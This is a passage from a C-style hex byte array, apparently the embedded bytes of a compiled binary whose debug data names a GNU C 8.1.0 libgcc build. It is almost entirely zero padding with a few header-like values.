,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x17 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0xe0 ,0x16 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0x00 ,0x00 ,0x0c ,0x00 ,0x00 ,0x00 ,0xd8 ,0xaa ,0x00 ,0x00 ,0x00 ,0x30 ,0x00 ,0x00 ,0x14 ,0x00 ,0x00 ,0x00 ,0x00 ,0xa0 ,0x30 ,0xa0 ,0x38 ,0xa0 ,0x40 ,0xa0 ,0x50 ,0xa0 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x60 ,0xa0 ,0x68 ,0xa0 ,0x80 ,0xa0 ,0xa0 ,0xa0 ,0xa8 ,0xa0 ,0xb0 ,0xa0 ,0xb8 ,0xa0 ,0x00 ,0xa2 ,0x10 ,0xa2 ,0x20 ,0xa2 ,0x30 ,0xa2 ,0x40 ,0xa2 ,0x50 ,0xa2 ,0x60 ,0xa2 ,0x70 ,0xa2 ,0x80 ,0xa2 ,0x90 ,0xa2 ,0xa0 ,0xa2 ,0xb0 ,0xa2 ,0xc0 ,0xa2 ,0xd0 ,0xa2 ,0x00 ,0x00 ,0x00 ,0xa0 ,0x00 ,0x00 ,0x10 ,0x00 ,0x00 ,0x00 ,0x18 ,0xa0 ,0x30 ,0xa0 ,0x38 ,0xa0 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2c ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x30 ,0x27 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x32 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x1c ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x2e ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2a ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x08 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x30 ,0x27 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x62 ,0x27 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x39 ,0x00 ,0x00 ,0x00 ,0x8f ,0x00 ,0x00 ,0x00 ,0x01 ,0x80 ,0xd6 ,0x1e ,0x00 ,0x00 ,0x04 ,0x00 ,0x14 ,0x00 ,0x00 ,0x00 ,0x08 ,0x01 ,0x47 ,0x4e ,0x55 ,0x20 ,0x43 ,0x31 ,0x37 ,0x20 ,0x38 ,0x2e ,0x31 ,0x2e ,0x30 ,0x20 ,0x2d ,0x6d ,0x74 ,0x75 ,0x6e ,0x65 ,0x3d ,0x63 ,0x6f ,0x72 ,0x65 ,0x32 ,0x20 ,0x2d ,0x6d ,0x61 ,0x72 ,0x63 ,0x68 ,0x3d ,0x6e ,0x6f ,0x63 ,0x6f ,0x6e ,0x61 ,0x20 ,0x2d ,0x67 ,0x20 ,0x2d ,0x67 ,0x20 ,0x2d ,0x67 ,0x20 ,0x2d ,0x4f ,0x32 ,0x20 ,0x2d ,0x4f ,0x32 ,0x20 ,0x2d ,0x4f ,0x32 ,0x20 ,0x2d ,0x66 ,0x6e ,0x6f ,0x2d ,0x69 ,0x64 ,0x65 ,0x6e ,0x74 ,0x20 ,0x2d ,0x66 ,0x62 ,0x75 ,0x69 ,0x6c ,0x64 ,0x69 ,0x6e ,0x67 ,0x2d ,0x6c ,0x69 ,0x62 ,0x67 ,0x63 ,0x63 ,0x20 ,0x2d ,0x66 ,0x6e ,0x6f ,0x2d ,0x73 ,0x74 ,0x61 ,0x63 ,0x6b ,0x2d ,0x70 ,0x72 ,0x6f ,0x74 ,0x65 ,0x63 ,0x74 ,0x6f ,0x72 ,0x00 ,0x0c ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f 